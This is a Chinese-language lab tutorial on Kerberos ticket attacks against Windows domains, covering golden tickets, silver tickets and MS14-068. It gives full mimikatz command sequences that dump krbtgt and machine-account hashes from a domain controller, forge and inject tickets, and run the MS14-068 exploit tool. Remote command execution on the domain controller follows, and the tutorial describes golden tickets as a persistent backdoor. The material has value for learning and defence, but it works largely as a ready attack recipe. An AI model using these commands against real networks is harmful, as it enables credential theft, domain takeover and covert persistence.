域渗透之票据传递攻击
目录
Kerberos 认证中的相关安全问题概述
Kerberos 认证并不是天衣无缝的,这其中也会有各种漏洞能够被我们利用,比如我们常说的 MS14-068、黄金票据、白银票据等就是基于Kerberos协议进行攻击的。下面我们便来大致介绍一下Kerberos 认证中的相关安全问题。
黄金票据(Golden ticket)
在 Windows 的 kerberos 认证过程中,Client 将自己的信息发送给 KDC,然后 KDC 使用 Krbtgt 用户的 NTLM 哈希作为密钥进行加密,生成 TGT。那么如果获取到了 Krbtgt 的 NTLM 哈希值,不就可以伪造任意的 TGT 了吗。因为 Krbtgt 只有域控制器上面才有,所以使用黄金凭据意味着你之前拿到过域控制器的权限,黄金凭据可以理解为一个后门。
利用 Krbtgt 的 Hash 值可以伪造生成任意的 TGT,能够绕过对任意用户的账号策略,让用户成为任意组的成员,可用于 Kerberos 认证的任何服务。
攻击者再使用黄金票据进行票据传递攻击时,通常要掌握以下信息:
需要伪造的域管理员用户名
完整的域名
域 SID
krbtgt 的 NTLM 哈希值
实验环境如下:
假设有这么一种情况,原先攻击机已拿到的域内所有的账户 Hash,包括 Krbtgt 这个账户,由于有些原因导致你对域管权限丢失,但好在你还有一个普通域用户权限,碰巧管理员在域内加固时忘记重置 Krbtgt 密码,基于此条件,我们还能利用该票据重新获得域管理员权限。
域成员主机:Windows 7
IP:192.168.93.20
域名:whoamianony.org
用户名:bunny
域控制器:Windows Server 2012
IP:192.168.93.30
域名:whoamianony.org
用户名:administrator
Mimikatz 下的利用
首先,我们登上域控,上传 mimikatz,然后执行如下命令抓取 krbtgt 用户的 Hash 值并获取域sid:
privilege::debug
lsadump::lsa /patch // 专用于在域控制器上导出用户密码或 hash
得到 krbtgt 用户的 Hash 和 域 SID 分别为:
-
Hash 值:6be58bfcc0a164af2408d1d3bd313c2a
-
域 SID:为 S-1-5-21-1315137663-3706837544-1429009142
然后,我们切换到普通域用户的机器Windows 7,用 mimikatz 生成名为 ticket.kirbi 的 TGT 凭证,用户名为 administrator:
kerberos::golden /user:administrator /domain:whoamianony.org /sid:S-1-5-21-1315137663-3706837544-1429009142 /krbtgt:6be58bfcc0a164af2408d1d3bd313c2a /ticket:ticket.kirbi
# kerberos::golden /user:需要伪造的域管理员用户名 /domain:域名 /sid:域sid /krbtgt: krbtgt用户的Hash /ticket:ticket.kirbi
如上图所示,成功生成 TGT 凭证 ticket.kirbi,名为 ticket.kirbi,然后使用 mimikatz 将凭证ticket.kirbi 注入进去:
kerberos::ptt ticket.kirbi
#kerberos::ptt <票据文件> 
此时我们可以执行以下来查看当前会话中的票据,就可以发现刚刚注入的票据在里面了:
kerberos::tgt 
到此,注入成功。输入“exit”退出mimikatz,此时,攻击者就可以利用 Windows 7 任意访问域控了:
dir \\DC\c$
也可以使用 psexec,wmi 等方法对域控进行远程执行命令:
psexec.exe \\DC cmd
可见,黄金票据可以当做一个安装在普通域成员主机上的连接到域控的后门。
白银票据(Silver ticket)
白银票据不同于黄金票据,白银票据的利用过程是伪造 TGS,通过已知的授权服务密码生成一张可以访问该服务的 TGT。因为在票据生成过程中不需要使用 KDC,所以可以绕过域控制器,很少留下日志。而黄金票据在利用过程中由 KDC 颁发 TGT,并且在生成伪造的 TGT 得20分钟内,TGS 不会对该 TGT 的真伪进行效验。
白银票据依赖于服务账号的密码散列值,这不同于黄金票据利用需要使用 krbtgt 账号的密码哈希值,因此更加隐蔽。
攻击者要利用白银票据进行票据传递攻击时,需要掌握下面几个信息:
-
域名
-
域 SID
-
目标服务器的 FQDN
-
可利用的服务
-
服务账号的 NTLM 哈希值
-
要伪造的用户名
实验环境如下:
域成员主机:Windows 7
IP:192.168.93.20
域名:whoamianony.org
用户名:bunny
域控制器:Windows Server 2012
IP:192.168.93.30
域名:whoamianony.org
用户名:administrator
下面我们就使用白银票据来伪造 CIFS 服务权限,CIFS 服务通常用于Windows 主机之间的文件共享。
首先登录域控,抓取机器账号的哈希值:
privilege::debug
sekurlsa::logonpasswords
这里的 NTLM 和 SHA1 都可以用。得到计算机账号的哈希为:6decb5d75eb5727d8535e67680b52571
(注意是 DC$ 用户的 NTLM 哈希,不是 Administrator 用户,因为要利用共享服务账号)
然后切换到普通域用户机器 Windows 7 中,使用 mimikatz 生成伪造的白银票据:
kerberos::golden /domain:whoamianony.org /sid:S-1-5-21-1315137663-3706837544-1429009142 /target:DC.whoamianony.org /rc4:6decb5d75eb5727d8535e67680b52571 /service:cifs /user:administrastor /ptt
# kerberos::golden /domain:域名 /sid:域 SID /target:FQDN /rc4:server 机器的哈希 /service:可利用的服务 /user:要伪造的用户名 /ptt
如上图所示,成功生成了伪造的白银票据,此时进行权限验证。如下,发现已经可以访问域控制器的共享目录了:
dir \\DC.whoamianony.org\c$ // 机器名要全称,注意是全称
通常情况下,黄金票据和白银票据更适合做为一个安装在普通域成员主机上的连接到域控的后门。但在内网横向移动中也经常遇到他的身影,通过黄金票据和白银票据,我们可以通过当前那下的机器作为跳板使用 psexec、wmi 等方式对目标机执行命令,也可以将生成的木马复制到目标机器上,然后通过计划任务或服务等方式执行,最终是目标机上线。
MS14-068
这里就涉及到了我们之前所讲的PAC这个东西了,
我们在关于 Kerberos 认证流程的介绍中提到了 PAC(Privilege Attribute Certificate)这个东西,这是微软为了访问控制而引进的一个扩展,即特权访问证书。
在 Kerberos 认证流程中,如果没有 PAC 的访问控制作用的话,只要用户的身份验证正确,那么就可以拿到 TGT,有了 TGT,就可以拿到 ST,有了 ST ,就可以访问服务了。此时任何一个经过身份验证的用户都可以访问任何服务。像这样的认证只解决了 "Who am i?" 的问题,而没有解决 "What can I do?" 的问题。
为了解决上面的这个问题,微软引进了PAC。即 KDC 向客户端 Client 返回AS_REP时插入了 PAC,PAC 中包含的是用户的 SID、用户所在的组等一些信息。当最后服务端 Server 收到 Client 发来的AP_REQ请求后,首先会对客户端身份验证。通过客户端身份验证后,服务器 Server 会拿着 PAC 去询问 DC 该用户是否有访问权限,DC 拿到 PAC 后进行解密,然后通过 PAC 中的 SID 判断用户的用户组信息、用户权限等信息,然后将结果返回给服务端,服务端再将此域用户请求的服务资源的 ACL 进行对比,最后决定是否给用户提供相关的服务。
但也恰恰是是这个 PAC,造成了 MS14-068 这个漏洞。该漏洞是位于 kdcsvc.dll 域控制器的密钥分发中心(KDC)服务中的 Windows 漏洞,它允许经过身份验证的用户在其获得的票证 TGT 中插入任意的 PAC 。普通用户可以通过呈现具有改变了 PAC 的 TGT 来伪造票据获得管理员权限。
攻击者要利用 MS14-068 这个漏洞提权时,需要掌握下面几个信息:
-
域内任意用户SID
-
域内任意用户密码
实验环境如下:
域成员主机:Windows 7
IP:192.168.93.20
域名:whoamianony.org
用户名:bunny
域控制器:Windows Server 2012
IP:192.168.93.30
域名:whoamianony.org
用户名:administrator
利用 MS14-068.exe
下载地址:WindowsExploits/MS14-068 at master · abatchy17/WindowsExploits · GitHub
首先,我们需要在目标主机 Windows 7 上面获得一个任意域用户的 SID:
whoami /all
然后再 Windows 7 上传工具 ms14-068.exe,并执行如下命令生成 TGT 票据:
ms14-068.exe -u bunny@whoamianony.org -s S-1-5-21-1315137663-3706837544-1429009142-1112 -d 192.168.93.30 -p Bunny2021
# ms14-068.exe -u 域成员名@域名 -s 域成员sid -d 域控制器ip地址 -p 域成员密码
如上图所示,成功生成了一个名为TGT_bunny@whoamianony.org.ccache的票据文件,接下来要做的就是将该票据文件注入到 Windows 7 的内存中了。
在 Windows 7 上传 mimikatz,利用 mimikatz 将票据注入到当前内存中,伪造凭证:
kerberos::purge //清空当前机器中所有凭证,如果有域成员凭证会影响凭证伪造
kerberos::list //查看当前机器凭证
kerberos::ptc TGT_bunny@whoamianony.org.ccache
#kerberos::ptc <票据文件> //将票据注入到内存中 
执行klist命令查看票据注入是否成功:
如上图,票据注入成功,此时,攻击者就可以利用 Windows 7 这个跳板机任意访问域中所有机器了,可以使用 net use 进行登录或者使用 psexec,wmi 等方法进行远程执行命令,后续的操作就和黄金票据一样了。
dir \\DC\c$
